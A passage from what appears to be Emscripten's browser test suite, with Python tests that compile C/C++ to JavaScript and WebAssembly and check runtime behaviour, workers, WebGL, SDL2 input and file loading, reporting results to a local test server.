ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--kill_exit', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
print(' '.join(args))
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], ['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=[] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
